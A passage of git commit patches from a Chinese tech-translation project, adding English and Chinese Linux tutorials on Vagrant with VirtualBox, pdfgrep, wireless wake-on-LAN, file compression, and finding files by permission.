https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.deb** - -& install it, - - **$ sudo dpkg -i vagrant_2.0.0_x86_64.deb** - -Once the installation is complete, we will move on to configuration part. - -### Configuration - -Firstly we need to create a folder where vagrant will install the OS we need, to create a folder - - **$ mkdir /home/dan** - - **$ cd /home/dan/vagrant** - - **Note:-** Its always preferable to create vagrant on your home directory as you might face permissions issue with a local user. - -Now to install the Operating system like CentOS, execute the following command, - - **$ sudo vagrant init centos/7** - -or for installing Ubuntu, run - - **$ sudo vagrant init ubuntu/trusty64** - -![vagrant boxes][3] - -![vagrant boxes][4] - -This will also create a configuration file in the directory created for keeping the vagrant OS, called 'Vagrantfile'. It contains information like OS, Private IP network, Forwarded Port, hostname etc. If we need to build a new operating system, we can also edit the file. - -Once we have created/modified the operating system with vagrant, we can start it up by running the following command, - - **$ sudo vagrant up** - -This might take some time as it operating system is being built with this command & its downloading the required files from Internet. So depending on the Internet speed, this process can take some time. - -![vagrant boxes][5] - -![vagrant boxes][6] - -Once the process completes, you than manage the vagrant instances using the following command, - -Start the vagrant server - - **$ sudo vagrant up** - -Stop the server - - **$ sudo vagrant halt** - -Or to completely remove the server - - **$ sudo vagrant destroy** - -To access the server using ssh, - - **$ sudo vagrant ssh** - -you will get the ssh details while the Vagrant Box is being setup (refer to screenshot above). - -To see the vagrant OS that has been built, you can open the virtual box & you will find it among the Virtual machines created in the VirtualBox. If you are not seeing your machines in VirtualBox, open virtualbox with sudo permissions & Vagrant Boxes should be there. - -![vagrant boxes][7] - -![vagrant boxes][8] - - **Note:-** There are pre-configured Vagrant OS created & can downloaded from the Official Vagrant Website. () - -This completes our tutorial on how to setup a vagrant machine on our CentOS and Ubuntu machines. Please leave any queries you have in the comment box below & we will surely address them. - -If you think we have helped you or just want to support us, please consider these :- - -Connect to us: [Facebook][9] | [Twitter][10] | [Google Plus][11] - -Linux TechLab is thankful for your continued support. - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/creating-vagrant-virtual-boxes-virtualbox/ - -作者:[Shusain][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ -[1]:http://linuxtechlab.com/installing-virtualbox-on-linux-centos-ubuntu/ -[2]:http://linuxtechlab.com/create-first-docker-container-beginners-guide/ -[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=721%2C87 -[4]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/vagrant-1.png?resize=721%2C87 -[5]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=980%2C414 -[6]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/vagrant-2-e1510557565780.png?resize=980%2C414 -[7]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=769%2C582 -[8]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/vagrant-3.png?resize=769%2C582 -[9]:https://www.facebook.com/linuxtechlab/ -[10]:https://twitter.com/LinuxTechLab -[11]:https://plus.google.com/+linuxtechlab diff --git a/translated/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md b/translated/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md new file mode 100644 index 0000000000..dfdf5fb204 --- /dev/null +++ b/translated/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md @@ -0,0 +1,122 @@ +使用 VirtualBox 创建 Vagrant boxes 的完全指南 +====== +Vagrant 是一个用来创建和管理虚拟机环境的工具,常用于建设开发环境。 它在 Docker, VirtualBox, Hyper-V, Vmware , AWS 等技术的基础上构建了一个易于使用且易于复制和重建的环境。 + +Vagrant Boxes 简化了软件配置部分的工作并且完全解决了软件开发项目中经常遇到的'它能在我机器上工作'的问题,从而提高开发效率。 + +在本文中,我们会在 Linux 机器上学习使用 VirtualBox 来配置 Vagrant Boxes。 + +### 前置条件 + +Vagrant 是基于虚拟化环境运行的,这里我们使用 VirtualBox 来提供虚拟化环境。 关于如何安装 VirutalBox 我们在 "[ **Installing VirtualBox on Linux**][1]" 中有详细描述, 阅读这篇文章并安装 VirtualBox。 + +安装好 VirtualBox 后,下一步就是配置 Vagrant 了。 + + **(推荐阅读 :[Create your first Docker Container ][2])** + +### 安装 + +VirtualBox 准备好后,我们来安装最新的 vagrant 包。 在写本文的时刻, Vagrant 的最新版本为 2.0.0。 使用下面命令下载最新的 rpm 文件: + + **$ wget https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.rpm** + +然后安装这个包: + + **$ sudo yum install vagrant_2.0.0_x86_64.rpm** + +如果是 Ubuntu,用下面这个命令来下载最新的 vagrant 包: + + **$ wget https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.deb** + +然后安装它, + + **$ sudo dpkg -i vagrant_2.0.0_x86_64.deb** + +安装结束后,就该进入配置环节了。 + +### 配置 + +首先,我们需要创建一个目录给 vagrant 来安装我们需要的操作系统, + + **$ mkdir /home/dan** + + **$ cd /home/dan/vagrant** + + **注意:-** 推荐在你的用户主目录下创建 vagrant,否则你可能会遇到本地用户相关的权限问题。 + +现在执行下面命令来安装操作系统,比如 CentOS: + + **$ sudo vagrant init centos/7** + +如果要安装 Ubuntu 则运行 + + **$ sudo vagrant init ubuntu/trusty64** + +![vagrant boxes][3] + +![vagrant boxes][4] + +这还会在存放 vagrant OS 的目录中创建一个叫做 'Vagrantfile' 的配置文件。它包含了一些关于操作系统,私有 IP 网络,转发端口,主机名等信息。 若我们需要创建一个新的操作系统, 也可以编辑这个问题。 + +一旦我们用 vagrant 创建/修改了操作系统,我们可以用下面命令启动它: + + **$ sudo vagrant up** + +这可能要花一些时间,因为这条命令要构建操作系统,它需要从网络上下载所需的文件。 因此根据互联网的速度, 这个过程可能会比较耗时。 + +![vagrant boxes][5] + +![vagrant boxes][6] + +这个过程完成后,你就可以使用下面这些命令来管理 vagrant 实例了 + +启动 vagrant 服务器 + + **$ sudo vagrant up** + +关闭服务器 + + **$ sudo vagrant halt** + +完全删除服务器 + + **$ sudo vagrant destroy** + +使用 ssh 访问服务器 + + **$ sudo vagrant ssh** + +我们可以从 Vagrant Box 的启动过程中得到 ssh 的详细信息(参见上面的截屏)。 + +如果想看创建的 vagrant OS,可以打开 virtualbox 然后你就能看在 VirtualBox 创建的虚拟机中找到它了。 如果在 VirtualBox 中没有找到, 使用 sudo 权限打开 virtualbox, 然后应该就能看到了。 + +![vagrant boxes][7] + +![vagrant boxes][8] + + **注意:-** 在 Vagrant 官方网站()上可以下载预先配置好的 Vagrant OS。 + +这就是本文的内容了。如有疑问请在下方留言,我们会尽快回复。 + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/creating-vagrant-virtual-boxes-virtualbox/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/installing-virtualbox-on-linux-centos-ubuntu/ +[2]:http://linuxtechlab.com/create-first-docker-container-beginners-guide/ +[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=721%2C87 +[4]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/vagrant-1.png?resize=721%2C87 +[5]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=980%2C414 +[6]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/vagrant-2-e1510557565780.png?resize=980%2C414 +[7]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=769%2C582 +[8]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/vagrant-3.png?resize=769%2C582 +[9]:https://www.facebook.com/linuxtechlab/ +[10]:https://twitter.com/LinuxTechLab +[11]:https://plus.google.com/+linuxtechlab From 2a8b4ca1c1161fa62915ef39f104b2f500c28762 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 15:59:40 +0800 Subject: [PATCH 0545/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Sear?= =?UTF-8?q?ch=20PDF=20Files=20from=20the=20Terminal=20with=20pdfgrep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...DF Files from the Terminal with pdfgrep.md | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md diff --git a/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md b/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md new file mode 100644 index 0000000000..20b454236c --- /dev/null +++ b/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md @@ -0,0 +1,63 @@ +How to Search PDF Files from the Terminal with pdfgrep +====== +Command line utilities such as [grep][1] and [ack-grep][2] are great for searching plain-text files for patterns matching a specified [regular expression][3]. But have you ever tried using these utilities to search for patterns in a PDF file? Well, don't! You will not get any result as these tools cannot read PDF files; they only read plain-text files. + +[pdfgrep][4], as the name suggests, is a small command line utility that makes it possible to search for text in a PDF file without opening the file. It is insanely fast - faster than the search provided by virtually all PDF document viewers. A great distinction between grep and pdfgrep is that pdfgrep operates on pages, whereas grep operates on lines. It also prints a single line multiple times if more than one match is found on that line. Let's look at how exactly to use the tool. + +For Ubuntu and other Linux distros based on Ubuntu, it is pretty simple: +``` +sudo apt install pdfgrep +``` + +For other distros, just provide `pdfgrep` as input for the [package manager][5], and that should get it installed. You can also check out the project's [GitLab page][6], in case you want to play around with the code. + +Now that you have the tool installed, let's go for a test run. pdfgrep command takes this format: +``` +pdfgrep [OPTION...] PATTERN [FILE...] +``` + + **OPTION** is a list of extra attributes to give the command such as `-i` or `--ignore-case`, which both ignore the case distinction between the regular pattern specified and the once matching it from the file. + + **PATTERN** is just an extended regular expression. + + **FILE** is just the name of the file, if it is in the same working directory, or the path to the file. + +I ran the command on Python 3.6 official documentation. The following image is the result. + +![pdfgrep search][7] + +![pdfgrep search][7] + +The red highlights indicate all the places the word "queue" was encountered. Passing `-i` as option to the command included matches of the word "Queue." Remember, the case does not matter when `-i` is passed as an option. + +pdfgrep has quite a number of interesting options to use. However, I'll cover only a few here. + + * `-c` or `--count`: this suppresses the normal output of matches. Instead of displaying the long output of the matches, it only displays a value representing the number of times the word was encountered in the file + * `-p` or `--page-count`: this option prints out the page numbers of matches and the number of occurrences of the pattern on the page + * `-m` or `--max-count` [number]: specifies the maximum number of matches. That means when the number of matches is reached, the command stops reading the file. + + + +The full list of supported options can be found in the man pages or in the pdfgrep online [documenation][8]. Don't forget pdfgrep can search multiple files at the same time, in case you're working with some bulk files. The default match highlight color can be changed by altering the GREP_COLORS environment variable. + +The next time you think of opening up a PDF file to search for anything. think of using pdfgrep. The tool comes in handy and will save you time. + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/search-pdf-files-pdfgrep/ + +作者:[Bruno Edoh][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com +[1] https://www.maketecheasier.com/what-is-grep-and-uses/ +[2] https://www.maketecheasier.com/ack-a-better-grep/ +[3] https://www.maketecheasier.com/the-beginner-guide-to-regular-expressions/ +[4] https://pdfgrep.org/ +[5] https://www.maketecheasier.com/install-software-in-various-linux-distros/ +[6] https://gitlab.com/pdfgrep/pdfgrep +[7] https://www.maketecheasier.com/assets/uploads/2017/11/pdfgrep-screenshot.png (pdfgrep search) +[8] https://pdfgrep.org/doc.html From 26577eb94de237a3e89ee66b0c56368fc8ad2c90 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 16:19:24 +0800 Subject: [PATCH 0546/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20conf?= =?UTF-8?q?igure=20wireless=20wake-on-lan=20for=20Linux=20WiFi=20card?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ireless wake-on-lan for Linux WiFi card.md | 107 ++++++++++++++++++ 1 file changed, 107 insertions(+) create mode 100644 sources/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md diff --git a/sources/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md b/sources/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md new file mode 100644 index 0000000000..59478471b8 --- /dev/null +++ b/sources/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md @@ -0,0 +1,107 @@ +translating by lujun9972 +How to configure wireless wake-on-lan for Linux WiFi card +====== +[![linux-configire-wake-on-wireless-lan-wowlan][1]][1] +Wake on Wireless (WoWLAN or WoW) is a feature to allow the Linux system to go into a low-power state while the wireless NIC remains active and stay connected to an AP. This quick tutorial shows how to enable WoWLAN or WoW (wireless wake-on-lan) mode with a wifi card installed in a Linux based laptop or desktop computer. + +Please note that not all WiFi cards or Linux drivers support the WoWLAN feature. + +## Syntax + +You need to use the iw command to see or manipulate wireless devices and their configuration on a Linux based system. The syntax is: +``` +iw command +iw [options] command +``` + +## List all wireless devices and their capabilities + +Type the following command: +``` +$ iw list +$ iw list | more +$ iw dev` +``` +Sample outputs: +``` +phy#0 + Interface wlp3s0 + ifindex 3 + wdev 0x1 + addr 6c:88:14:ff:36:d0 + type managed + channel 149 (5745 MHz), width: 40 MHz, center1: 5755 MHz + txpower 15.00 dBm + +``` + +Please note down phy0. + +## Find out the current status of your wowlan + +Open the terminal app and type the following command to tind out wowlan status: +`$ iw phy0 wowlan show` +Sample outputs: +`WoWLAN is disabled` + +## How to enable wowlan + +The syntax is: +`sudo iw phy {phyname} wowlan enable {option}` +Where, + + 1. {phyname} - Use iw dev to get phy name. + 2. {option} - Can be any, disconnect, magic-packet and so on. + + + +For example, I am going to enable wowlan for phy0: +`$ sudo iw phy0 wowlan enable any` +OR +`$ sudo iw phy0 wowlan enable magic-packet disconnect` +Verify it: +`$ iw phy0 wowlan show` +Sample outputs: +``` +WoWLAN is enabled: + * wake up on disconnect + * wake up on magic packet + +``` + +## Test it + +Put your laptop in suspend or sleep mode and send ping request or magic packet from your nas server: +`$ sudo sh -c 'echo mem > /sys/power/state'` +Send ping request from your nas server using the [ping command][3] +`$ ping your-laptop-ip` +OR [send magic packet using wakeonlan command][4] : +`$ wakeonlan laptop-mac-address-here +$ etherwake MAC-Address-Here` + +## How do I disable WoWLAN? + +The syntax is: +`$ sudo phy {phyname} wowlan disable +$ sudo phy0 wowlan disable` + +For more info read the iw command man page: +`$ man iw +$ iw --help` + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/ + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://twitter.com/nixcraft +[1] https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg +[2] https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html +[3] //www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info) +[4] https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/ From 2189cdf813af3c4931808edcc3b7f08a56c56bad Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 16:42:23 +0800 Subject: [PATCH 0547/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20sque?= =?UTF-8?q?eze=20the=20most=20out=20of=20Linux=20file=20compression?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... the most out of Linux file compression.md | 144 ++++++++++++++++++ 1 file changed, 144 insertions(+) create mode 100644 sources/tech/20171214 How to squeeze the most out of Linux file compression.md diff --git a/sources/tech/20171214 How to squeeze the most out of Linux file compression.md b/sources/tech/20171214 How to squeeze the most out of Linux file compression.md new file mode 100644 index 0000000000..3993944206 --- /dev/null +++ b/sources/tech/20171214 How to squeeze the most out of Linux file compression.md @@ -0,0 +1,144 @@ +How to squeeze the most out of Linux file compression +====== +If you have any doubt about the many commands and options available on Linux systems for file compression, you might want to take a look at the output of the **apropos compress** command. Chances are you'll be surprised by the many commands that you can use for compressing and decompressing files, as well as for comparing compressed files, examining and searching through the content of compressed files, and even changing a compressed file from one format to another (i.e., .z format to .gz format). + +You're likely to see all of these entries just for the suite of bzip2 compression commands. Add in zip, gzip, and xz, and you've got a lot of interesting options. +``` +$ apropos compress | grep ^bz +bzcat (1) - decompresses files to stdout +bzcmp (1) - compare bzip2 compressed files +bzdiff (1) - compare bzip2 compressed files +bzegrep (1) - search possibly bzip2 compressed + files for a regular expression +bzexe (1) - compress executable files in place +bzfgrep (1) - search possibly bzip2 compressed + files for a regular expression +bzgrep (1) - search possibly bzip2 compressed + files for a regular expression +bzip2 (1) - a block-sorting file compressor, + v1.0.6 +bzless (1) - file perusal filter for crt viewing + of bzip2 compressed text +bzmore (1) - file perusal filter for crt viewing + of bzip2 compressed text + +``` + +On my Ubuntu system, over 60 commands were listed in response to the apropos compress command. + +### Compression algorithms + +Compression is not a one-size-fits-all issue. Some compression tools are "lossy," such as those used to reduce the size of mp3 files while allowing listeners to have what is nearly the same musical experience as listening to the originals. But algorithms used on the Linux command line to compress or archive user files have to be able to reproduce the original content exactly. In other words, they have to be lossless. + +How is that done? It's easy to imagine how 300 of the same character in a row could be compressed to something like "300X," but this type of algorithm wouldn't be of much benefit for most files because they wouldn't contain long sequences of the same character any more than they would completely random data. Compression algorithms are far more complex and have only been getting more so since compression was first introduced in the toddler years of Unix. + +### Compression commands on Linux systems + +The commands most commonly used for file compression on Linux systems include zip, gzip, bzip2 and xz. All of those commands work in similar ways, but there are some tradeoffs in terms of how much the file content is squeezed (how much space you save), how long the compression takes, and how compatible the compressed files are with other systems you might need to use them on. + +Sometimes the time and effort of compressing a file doesn't pay off very well. In the example below, the "compressed" file is actually larger than the original. While this isn't generally the case, it can happen -- especially when the file content approaches some degree of randomness. +``` +$ time zip bigfile.zip bigfile + adding: bigfile (deflated 0%) + +real 1m6.310s +user 0m52.424s +sys 0m2.288s +$ +$ ls -l bigfile* +-rw-rw-r-- 1 shs shs 1073741824 Dec 8 10:06 bigfile +-rw-rw-r-- 1 shs shs 1073916184 Dec 8 11:39 bigfile.zip + +``` + +Note that the compressed version of the file (bigfile.zip) is actually a little larger than the original file. If compression increases the size of a file or reduces its size by some very small percentage, the only benefit may be that you may have a convenient online backup. If you see a message like this after compressing a file, you're not gaining much. +``` +(deflated 1%) + +``` + +The content of a file plays a large role in how well it will compress. The file that grew in size in the example above was fairly random. Compress a file containing only zeroes, and you'll see an amazing compression ratio. In this admittedly extremely unlikely scenario, all three of the commonly used compression tools do an excellent job. +``` +-rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt +-rw-rw-r-- 1 shs shs 49 Dec 8 17:28 zeroes.txt.bz2 +-rw-rw-r-- 1 shs shs 10219 Dec 8 17:28 zeroes.txt.gz +-rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz +-rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip + +``` + +While impressive, you're not likely to see files with over 10 million bytes compressing down to fewer than 50, since files like these are extremely unlikely. + +In this more realistic example, the size differences are altogether different -- and not very significant -- for a fairly small jpg file. +``` +-rw-r--r-- 1 shs shs 13522 Dec 11 18:58 image.jpg +-rw-r--r-- 1 shs shs 13875 Dec 11 18:58 image.jpg.bz2 +-rw-r--r-- 1 shs shs 13441 Dec 11 18:58 image.jpg.gz +-rw-r--r-- 1 shs shs 13508 Dec 11 18:58 image.jpg.xz +-rw-r--r-- 1 shs shs 13581 Dec 11 18:58 image.jpg.zip + +``` + +Do the same thing with a large text file, and you're likely to see some significant differences. +``` +$ ls -l textfile* +-rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile +-rw-rw-r-- 1 shs shs 1519807 Dec 11 18:41 textfile.bz2 +-rw-rw-r-- 1 shs shs 1977669 Dec 11 18:41 textfile.gz +-rw-rw-r-- 1 shs shs 1024700 Dec 11 18:41 textfile.xz +-rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip + +``` + +In this case, xz reduced the size considerably more than the other commands with bzip2 coming in second. + +### Looking at compressed files + +The *more commands (bzmore and others) allow you to view the contents of compressed files without having to uncompress them first. +``` +bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text +lzmore (1) - view xz or lzma compressed (text) files +xzmore (1) - view xz or lzma compressed (text) files +zmore (1) - file perusal filter for crt viewing of compressed text + +``` + +These commands are all doing a good amount of work, since they have to decompress a file's content just to display it to you. They do not, on the other hand, leave uncompressed file content on the system. They simply decompress on the fly. +``` +$ xzmore textfile.xz | head -1 +Here is the agenda for tomorrow's staff meeting: + +``` + +### Comparing compressed files + +While several of the compression toolsets include a diff command (e.g., xzdiff), these tools pass the work off to cmp and diff and are not doing any algorithm-specific comparisons. For example, the xzdiff command will compare bz2 files as easily as it will compare xz files. + +### How to choose the best Linux compression tool + +The best tool for the job depends on the job. In some cases, the choice may depend on the content of the data being compressed, but it's more likely that your organization's conventions are just as important unless you're in a real pinch for disk space. The best general suggestions seem to be these: + + **zip** is best when files need to be shared with or used on Windows systems. + + **gzip** may be best when you want the files to be usable on any Unix/Linux system. Though bzip2 is becoming nearly as ubiquitous, it is likely to take longer to run. + + **bzip2** uses a different algorithm than gzip and is likely to yield a smaller file, but they take a little longer to get the job done. + + **xz** generally offers the best compression rates, but also takes considerably longer to run. It's also newer than the other tools and may not yet exist on all the systems you need to work with. + +### Wrap-up + +There are a number of choices when it comes to how to compress files and only a few situations in which they don't yield valuable disk space savings. + + +-------------------------------------------------------------------------------- + +via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html + +作者:[Sandra Henry-Stocker][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.networkworld.com From eb204836dbcc9ac6aece7c537ebc6a2569dbef24 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 16:46:38 +0800 Subject: [PATCH 0548/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Find?= =?UTF-8?q?=20Files=20Based=20On=20their=20Permissions?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...o Find Files Based On their Permissions.md | 171 ++++++++++++++++++ 1 file changed, 171 insertions(+) create mode 100644 sources/tech/20171207 How To Find Files Based On their Permissions.md diff --git a/sources/tech/20171207 How To Find Files Based On their Permissions.md b/sources/tech/20171207 How To Find Files Based On their Permissions.md new file mode 100644 index 0000000000..ec8f17e296 --- /dev/null +++ b/sources/tech/20171207 How To Find Files Based On their Permissions.md @@ -0,0 +1,171 @@ +How To Find Files Based On their Permissions +====== +Finding files in Linux is not a big deal. There are plenty of free and open source graphical utilities available on the market. In my opinion, finding files from command line is much easier and faster. We already knew how to [**find and sort files based on access and modification date and time**][1]. Today, we will see how to find files based on their permissions in Unix-like operating systems. + +For the purpose of this guide, I am going to create three files namely **file1** , **file2** and **file3** with permissions **777** , **766** , **655** respectively in a folder named **ostechnix**. +``` +mkdir ostechnix && cd ostechnix/ +``` +``` +install -b -m 777 /dev/null file1 +``` +``` +install -b -m 766 /dev/null file2 +``` +``` +install -b -m 655 /dev/null file3 +``` + +[![][2]][3] + +Now let us find the files based on their permissions. + +### Find files Based On their Permissions + +The typical syntax to find files based on their permissions is: +``` +find -perm mode +``` + +The MODE can be either with numeric or octal permission (like 777, 666.. etc) or symbolic permission (like u=x, a=r+x). + +Before going further, we can specify the MODE in three different ways. + + 1. If we specify the mode without any prefixes, it will find files of **exact** permissions. + 2. If we use **" -"** prefix with mode, at least the files should have the given permission, not the exact permission. + 3. If we use **" /"** prefix, either the owner, the group, or other should have permission to the file. + + + +Allow me to explain with some examples, so you can understand better. + +First, we will see finding files based on numeric permissions. + +### Find Files Based On their Numeric (octal) Permissions + +Now let me run the following command: +``` +find -perm 777 +``` + +This command will find the files with permission of **exactly 777** in the current directory. + +[![][2]][4] + +As you see in the above output, file1 is the only one that has **exact 777 permission**. + +Now, let us use "-" prefix and see what happens. +``` +find -perm -766 +``` + +[![][2]][5] + +As you see, the above command displays two files. We have set 766 permission to file2, but this command displays two files, why? Because, here we have used "-" prefix". It means that this command will find all files where the file owner has read/write/execute permissions, file group members have read/write permissions and everything else has also read/write permission. In our case, file1 and file2 have met this criteria. In other words, the files need not to have exact 766 permission. It will display any files that falls under this 766 permission. + +Next, we will use "/" prefix and see what happens. +``` +find -perm /222 +``` + +[![][2]][6] + +The above command will find files which are writable by somebody (either their owner, or their group, or anybody else). Here is another example. +``` +find -perm /220 +``` + +This command will find files which are writable by either their owner or their group. That means the files **don 't have to be writable** by **both the owner and group** to be matched; **either** will do. + +But if you run the same command with "-" prefix, you will only see the files only which are writable by both owner and group. +``` +find -perm -220 +``` + +The following screenshot will show you the difference between these two prefixes. + +[![][2]][7] + +Like I already said, we can also use symbolic notation to represent the file permissions. + +Also read: + +### Find Files Based On their Permissions using symbolic notation + +In the following examples, we use symbolic notations such as **u** ( for user), **g** (group), **o** (others). We can also use the letter **a** to represent all three of these categories. The permissions can be specified using letters **r** (read), **w** (write), **x** (executable). + +For instance, to find any file with group **write** permission, run: +``` +find -perm -g=w +``` + +[![][2]][8] + +As you see in the above example, file1 and file2 have group **write** permission. Please note that you can use either "=" or "+" for symbolic notation. It doesn't matter. For example, the following two commands do the same thing. +``` +find -perm -g=w +find -perm -g+w +``` + +To find any file which are writable by the file owner, run: +``` +find -perm -u=w +``` + +To find any file which are writable by all (the file owner, group and everyone else), run: +``` +find -perm -a=w +``` + +To find files which are writable by **both** their **owner** and their **group** , use this command: +``` +find -perm -g+w,u+w +``` + +The above command is equivalent of "find -perm -220" command. + +To find files which are writable by **either** their **owner** or their **group** , run: +``` +find -perm /u+w,g+w +``` + +Or, +``` +find -perm /u=w,g=w +``` + +These two commands does the same job as "find -perm /220" command. + +For more details, refer the man pages. +``` +man find +``` + +Also, check the [**man pages alternatives**][9] to learn more simplified examples of any Linux command. + +And, that's all for now folks. I hope this guide was useful. More good stuffs to come. Stay tuned. + +Cheers! + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/find-files-based-permissions/ + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com +[1] https://www.ostechnix.com/find-sort-files-based-access-modification-date-time-linux/ +[2] data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 +[3] http://www.ostechnix.com/wp-content/uploads/2017/12/find-files-1-1.png () +[4] http://www.ostechnix.com/wp-content/uploads/2017/12/find-files-2.png () +[5] http://www.ostechnix.com/wp-content/uploads/2017/12/find-files-3.png () +[6] http://www.ostechnix.com/wp-content/uploads/2017/12/find-files-6.png () +[7] http://www.ostechnix.com/wp-content/uploads/2017/12/find-files-7.png () +[8] http://www.ostechnix.com/wp-content/uploads/2017/12/find-files-8.png () +[9] https://www.ostechnix.com/3-good-alternatives-man-pages-every-linux-user-know/ From 59657520787a55c222ac48c8d0974fc190e8ba26 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 16:53:10 +0800 Subject: [PATCH 0549/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Complete=20?= =?UTF-8?q?=E2=80=9CBeginners=20to=20PRO=E2=80=9D=20guide=20for=20GIT=20co?= =?UTF-8?q?mmands?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Beginners to PRO” guide for GIT commands.md | 215 ++++++++++++++++++ 1 file changed, 215 insertions(+) create mode 100644 sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md diff --git a/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md b/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md new file mode 100644 index 0000000000..a290a8e1ca --- /dev/null +++ b/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md @@ -0,0 +1,215 @@ +Complete “Beginners to PRO” guide for GIT commands +====== +In our [**earlier tutorial,**][1] we have learned to install git on our machines. In this tutorial, we will discuss how we can use git i.e. various commands that are used with git. So let's start,In our earlier tutorial, we have learned to install git on our machines. In this tutorial, we will discuss how we can use git i.e. various commands that are used with git. So let's start, + +( **Recommended Read** : 